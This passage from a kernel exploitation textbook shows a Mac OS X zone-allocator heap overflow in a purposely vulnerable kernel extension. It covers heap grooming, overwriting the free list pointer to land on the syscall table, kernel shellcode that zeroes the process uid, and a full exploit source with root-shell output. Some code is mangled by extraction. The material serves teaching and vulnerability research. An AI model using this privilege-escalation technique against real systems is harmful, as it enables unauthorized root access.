In the FREEBUFFER case, we simply check if the buffer passed in by the user in kern_ptr is one of the buffers allocated by our kext. If it is, it is passed to zfree() to be returned to the zone. Here is the full source listing for our IOCTL:

static int ZoneAllocOverflowIOCTL(dev_t dev, u_long cmd, caddr_t data,int flag, struct proc *p)

{

datastruct *ds = (datastruct *)data;

char *buffer = 0;

switch(cmd) {

case ADDBUFFER:

printf("Adding buffer to array ");

buffer = zalloc(buff_zone);

if(!buffer) {

printf("error: could not allocate buffer ");

return KERN_FAILURE;

}

memset(buffer,'x00',BUFFSIZE);

if(sizeof(data) > BUFFSIZE){

printf("error: data too big for buffer. ");

return KERN_FAILURE;

}

if(copyin((void *)ds->data, (void *)buffer, ds->size) == − 1){

printf("error: copyin failed. ");

return KERN_FAILURE;

}

if(add_buffer(buffer) == KERN_FAILURE){

printf("max number of buffers reached ");

return KERN_FAILURE;

}

ds->kern_ptr = buffer;

return KERN_SUCCESS;

break;

case FREEBUFFER:

printf("Freeing buffer… ");

if(free_buffer(ds->kern_ptr) == KERN_FAILURE){

printf("could not locate buffer to free ");

return KERN_FAILURE;

}

ds->kern_ptr = 0;

break;

default:

printf("error: bad ioctl cmd ");

return KERN_FAILURE;

}

printf("Success! ");

return KERN_SUCCESS;

}

Now that our target is defined it's time to look at how we would exploit this example. In reality, this example is a little too perfect as it allows us to arbitrarily allocate chunks and free them in any order we choose. As we mentioned, it also leaks the address of the chunk back to user space, which is very useful from an exploitation perspective.

Before we trigger the overflow, we can make an application that simply calls ioctl() three times in a row using the ADDBUFFER command, then prints the address of the buffer returned. Here is the resultant output:

alloc1 @ 0x4975dec

alloc2 @ 0x4975dc0

alloc3 @ 0x4975d94

As we can see, each allocation is performed starting from the high end of the mapping and moving toward the low memory addresses. We can also see that each allocation is exactly 44 bytes apart. If we run this program a few times and then execute zprint, we can see our BUFFERZONE statistics in the output:

vstruct.zone 80 0K 784K 0 10035 0 4K 51 C

BUFFERZONE 44 3K 24K 93 558 15 4K 93 C

kernel_stacks 16384 1440K 1440K 90 90 68 16K 1 C

The next step toward exploiting this kernel extension is to observe our zone's behavior when we use the FREEBUFFER command with our IOCTL. If we modify our test program a little to allocate three chunks, retain the address of the first and second chunks, and then free them in turn, we can see that the next allocation performed will always return the last chunk free()'ed by the zone allocator. This opens up all the possibilities we described in Chapter 3 when we talked about general kernel heap allocator techniques. The only difference is that we target a free chunk with our overflow, not an allocated victim. Since chunks are allocated from high addresses toward low addresses, this means we need to free our two allocations in the reverse order to receive the allocation stored in lower memory upon our next allocation. Here is the output from our sample program to verify this:

-[luser@macosxbox]$ ./zonesmash

alloc1 @ 0x48cadec

alloc2 @ 0x48cadc0

alloc @ 0x48caad94

[+] Freeing alloc2

[+] Freeing alloc1

new alloc @ 0x48cadc0

The first step in almost any heap overflow exploit is to try to get the heap to a known reliable state. Since the heap is used dynamically with buffers allocated and freed according to program logic, the heap can be in a different state every time exploitation is attempted. Thankfully, with a zone allocator this is a relatively easy problem to solve. To get the heap to a reliable state we can query the capacity of the target zone using zprint. Then we can perform as many allocations as necessary without filling the maximum number of entries queried by zprint to remove all entries from free_list. When free_list is emptied we can allocate our chunks with the knowledge that they will be contiguous in memory. Also, unlike other forms of memory allocators, we are at no risk of our chunks being coalesced because all chunks in a zone are of the same size.

Since our example is relatively controlled, our sample exploit simply performs 10 allocations to make sure free_list is clean:

// fill gaps

int i;

for(i = 0; i <= 10; i++)

ioctl(fd, ADDBUFFER,&ds);

Now that the zone is in a clean state, we can perform the same allocations our investigatory code performed earlier. We allocate three buffers and free the first two allocations. Then we perform another allocation, this time overflowing outside the 44-byte boundary of our newly returned chunk. This will allow us to overwrite the next_chunk pointer in the free chunk directly below our current chunk in memory. When we perform an additional allocation, this adjacent chunk is removed from free_list. As we discussed earlier in this section, the REMOVE_FROM_ZONE macro will write the overflowed next_chunk pointer to the head of free_list in the zone struct. This means the next allocation from our zone will result in the user-controlled pointer being returned as the allocation itself. To test this theory, we write 44 bytes into our chunk, followed by the 4-byte value 0xcafebabe. After our allocations are performed, we print the zone struct using the print command in GDB, and we can see that the free_elements attribute indeed contains 0xcafebabe.

(gdb) print *(struct zone *)0x16c8fd4

$1 = {

count = 15,

free_elements = 3405691582, (0xcafebabe)

This means the next time we perform an ADDBUFFER command with this IOCTL, we will be able to write user-controlled data to any location of our choice within the kernel. At this stage, we have an almost identical situation as in our arbitrary memory overwrite example earlier in this section. Just like in that example, we are able to locate the address of the sysent table and overwrite an unused sysent struct. However, since zalloc() actually forcefully writes x00 bytes over the newly returned buffer, we cannot limit our overwrite to only the size of the sysent struct, as the full 44 bytes will be filled with NULL bytes. However, since the structure of the sysent table is actually quite predictable and static, we could simply fill our buffer with values retrieved from the mach_kernel binary for the system to remain unchanged by the overwrite.

The implementation of this approach is left as an exercise, however, as in this case, the size of the overwrite (44 bytes) is small enough that it will overwrite only two sysent entries. The value we used in the earlier example (syscall 21) is actually followed by another empty sysent entry. Therefore, clobbering the unused sysent entry with zeros has very few negative consequences for us.

If we modify our code from the beginning of the section “Exploitation Notes,” to move the address of the sysent struct we wish to modify, to free_list, and then write our fake sysent struct into the next allocation and call our system call with syscall(21,0,0,0), we are greeted with the familiar message signifying that we have gained control of EIP:

(gdb) c

Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.

0xdeadbeef in ?? ()

At first glance, you may be concerned that when removing the pointer to the sysent array from free_list the pointer would have been dereferenced and the result used to update the head of free_list. However, we can rely on the fact that the empty sysent entry we are overwriting has the initial state of being filled with NULL bytes. This means the free list head will be updated with a 0x0. This will re-create our empty free_list and result in a reliable exploit.

Now that we have reliable control of execution, we need to determine where to put our shellcode. In this crafted scenario, this is an easy problem to solve, because our sample kernel extension leaks heap addresses back to user space. By storing the shellcode in our third allocation and then using its address as the return address, we can reliably return to our shellcode.

Note

Had this information leak not existed, however, we could have simply utilized the p_comm technique we discussed in the section “Exploitation Notes.”

Putting this all together, and compiling and executing our exploit, gives us a root shell:

-[luser@macosxbox]$ ./zonesmash

[+] Retrieving address of syscall table…

[+] nsysent is @ 0x50f9e0

[+] Syscall 21 is @ 0x50fbf8

alloc1 @ 0x3b02dec

alloc2 @ 0x3b02dc0

shellcode @ 0x3b02d94

[+] Freeing alloc1

[+] Freeing alloc2

[+] Performing overwrite

new alloc @ 0x3b02dc0

[+] Moving sysent address to free_list

[+] Setting up fake syscall entry.

uid: 0 euid: 501

sh-3.2# id

Again, as usual, the full source code for this exploit is available online at www.attackingthecore.com.

For the sake of completeness we have also included it here:

#include <stdio.h>

#include <stdlib.h>

#include <fcntl.h>

#include <sys/ioctl.h>

#include <sys/types.h>

#include <sys/sysctl.h>

#include <sys/param.h>

#include <unistd.h>

#define BUFFSIZE 44+4

#define ADDBUFFER _IOWR('d',0,datastruct)

#define FREEBUFFER _IOWR('d',1,datastruct)

#define SYSCALL_NUM 21

#define LEOPARD_HIT_ADDY(a) ((a)+(sizeof(struct sysent)*SYSCALL_NUM))

struct sysent {

short sy_narg;

char sy_resv;

char sy_flags;

void *sy_call;

void *sy_arg_munge32;

void *sy_arg_munge64;

int sy_return_type;

short sy_arg_bytes;

};

typedef struct datastruct {

void *data;

unsigned long size;

void *kern_ptr;

} datastruct;

unsigned char shellcode[] =

"x55" // push ebp

"x89xE5" // mov ebp,esp

"x8Bx4Dx08" // mov ecx,[ebp+0x8]

"x8Bx49x64" // mov ecx,[ecx+0x64]

"x31xC0" // xor eax,eax

"x89x41x10" // mov [ecx+0xc],eax

"xC9" // leave

"xC3"; // ret

u_long get_symbol(char *symbol)

{

#define NMSTRING "nm /mach_kernel | grep "

unsigned int length = strlen(NMSTRING) + strlen(symbol) + 4;

char *buffer = malloc(length);

FILE *fp;

if(!buffer){

printf("error: allocating symbol string ");

exit(1);

}

snprintf(buffer,length-1,NMSTRING"%s",symbol);

fp = popen(buffer, "r");

u_long addr = 0;

fscanf(fp,"%x ",&addr);

printf("[+] %s is @ 0x%x ",symbol,addr);

free(buffer);

return addr;

}

int main(int ac, char **av)

{

struct sysent fsysent;

datastruct ds;

int fd;

unsigned char attackstring[BUFFSIZE];

unsigned long *ptr,sc_addr;

char *env[] = {"TERM=xterm",NULL};

void *ret;

char *shell[] = {"/bin/sh",NULL};

//size_t done = 0;

if((fd = open ("/dev/heapoverflow", O_RDONLY)) == -1 ){

printf("error: couldn't open /dev/heapoverflow ");

exit(1);

}

memset(attackstring,'x90',BUFFSIZE);

memcpy(attackstring,shellcode,sizeof(shellcode));

ds.data = attackstring;

ds.size = sizeof(shellcode);

ds.kern_ptr = 0;

printf("[+] Retrieving address of syscall table… ");

sc_addr = get_symbol("nsysent");

sc_addr + = 32;

sc_addr = LEOPARD_HIT_ADDY(sc_addr);

//sc_addr -= 10;

printf("[+] Syscall 21 is @ 0x%x ", sc_addr);

//exit(0);

// fill gaps

int i;

for(i = 0; i <= 10; i++)

ioctl(fd, ADDBUFFER,&ds);

void *alloc1 = 0;

void *alloc2 = 0;

ioctl(fd, ADDBUFFER,&ds);

if(ds.kern_ptr != 0) {

alloc1 = ds.kern_ptr;

printf("alloc1 @ 0x%x ", ds.kern_ptr);

}

ioctl(fd, ADDBUFFER,&ds);

if(ds.kern_ptr != 0) {

alloc2 = ds.kern_ptr;

printf("alloc2 @ 0x%x ", ds.kern_ptr);

}

ioctl(fd, ADDBUFFER,&ds);

if(!ds.kern_ptr) {

printf("[+] Shellcode failed to be allocated ");

exit(1);

}

ret = ds.kern_ptr;

printf("shellcode @ 0x%x ", ds.kern_ptr);

printf("[+] Freeing alloc1 ");

ds.kern_ptr = alloc1;

ioctl(fd, FREEBUFFER,&ds);

if(ds.kern_ptr != 0) {

printf("free failed. ");

}

printf"[+] Freeing alloc2 ");

ds.kern_ptr = alloc2;

ioctl(fd, FREEBUFFER,&ds);

if(ds.kern_ptr != 0) {

printf("free failed. ");

exit(1);

}

ptr = &attackstring[BUFFSIZE-sizeof(void *)];

*ptr = sc_addr;

printf("[+] Performing overwrite ");

ds.size = BUFFSIZE;

ioctl(fd, ADDBUFFER,&ds);

if(ds.kern_ptr != 0) {

printf("new alloc @ 0x%x ", ds.kern_ptr);

}

printf("[+] Moving sysent address to free_list ");

ds.size = 10;

ioctl(fd, ADDBUFFER,&ds);

if(ds.kern_ptr != 0) {

alloc1 = ds.kern_ptr;

}

ds.size = 10;

printf("[+] Setting up fake syscall entry. ");

fsysent.sy_narg = 1;

fsysent.sy_resv = 0;

fsysent.sy_flags = 0;

fsysent.sy_call = (void *)ret;

fsysent.sy_arg_munge32 = NULL;

fsysent.sy_arg_munge64 = NULL;

fsysent.sy_return_type = 0;

fsysent.sy_arg_bytes = 4;

ds.data = &fsysent;

ds.size = sizeof(fsysent);

ds.kern_ptr = 0;

ioctl(fd, ADDBUFFER,&ds);

syscall(21,0,0,0);

printf("uid: %i euid: %i ",getuid(),geteuid());

execve(*shell,shell,env);

}

We mentioned at the start of this section that the zone allocator was the basic building block for the kalloc (kernel allocator). This could not be any truer; in fact, the kernel allocator (the most widely used general-purpose allocator in XNU) is simply a wrapper around zalloc functionality. During kalloc initialization, several zones are created with the zone allocator. Each zone is used to house allocations of different sizes. Allocations larger than the largest zone are performed using kmem_allocate(), which just creates new page mappings. The k_zone_name array shown in the following code contains the name of each zone:

static const char *k_zone_name[16] = {

"kalloc.1", "kalloc.2",

"kalloc.4", "kalloc.8",

"kalloc.16", "kalloc.32",

"kalloc.64", "kalloc.128",

"kalloc.256", "kalloc.512",

"kalloc.1024", "kalloc.2048",

"kalloc.4096", "kalloc.8192",

"kalloc.16384", "kalloc.32768"

}

When a kalloc allocation takes place, the size is compared against an array of each zone; then zalloc_canblock() is called directly to allocate a new chunk. Because of this behavior, the technique shown in the preceding code for zalloc will work identically on a kalloc allocated buffer.

Race Conditions

The XNU kernel is preemptive; therefore, race conditions are abundant. The authors are aware of several undisclosed vulnerabilities in XNU due to this fact. However, the exploitation of these vulnerabilities is completely identical to any other UNIX derived operating system, so the techniques we described in Chapter 4 will be completely valid on Mac OS X.

Snow Leopard Exploitation

As we discussed in the chapter introduction, the latest release of Mac OS X, named Snow Leopard, is a 64-bit operating system. Nevertheless, the kernel has changed less than you'd expect. By default, Snow Leopard boots with a separate 32-bit kernel and 64-bit user space. This means many of the techniques we've looked at in this chapter are still completely valid on Snow Leopard. Snow Leopard can also be initialized to use a 64-bit kernel, but from what we can tell so far, nothing has been changed that will limit the techniques we described.

Summary

In this chapter, we highlighted some of the similarities and differences between Mac OS X and other UNIX derivatives. Mac OS X can be an interesting platform on which to perform vulnerability research, as there is very little documented work on the subject. Its user base has also been growing significantly in recent years.

The design of Mac OS X is different from the majority of the x86/x86-64 implementations of the other operating systems we discuss in this book, and as we detailed, this poses a few interesting challenges. The most interesting challenge is its separated user and kernel address space. It's no surprise that the technique we used—placing the shellcode inside the command line—was first applied against Solaris/UltraSPARC environments and presented in the PHRACK 64 article “Kernel Exploitation Notes.” This “borrowing” or “reusing” of techniques should be expected. At its heart, Mac OS X is a BSD derivate, and thus is still a child of the UNIX family.

Since Mac OS X is not entirely open source, we focused a little more on some common debugging and reverse-engineering approaches, showing how closed source extensions may present interesting (and vulnerable) paths (using IDA Pro software). In Chapter 6 we will continue our discussion of closed source operating systems when we take a look at vulnerability exploitation in the Windows operating system.

A It is possible to use DDB instead of GDB; however, to do this a custom kernel is needed, and a serial connection must be used.

B www.hexrays.com

C www.digit-labs.org/files/exploits/vmware-fission.c

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset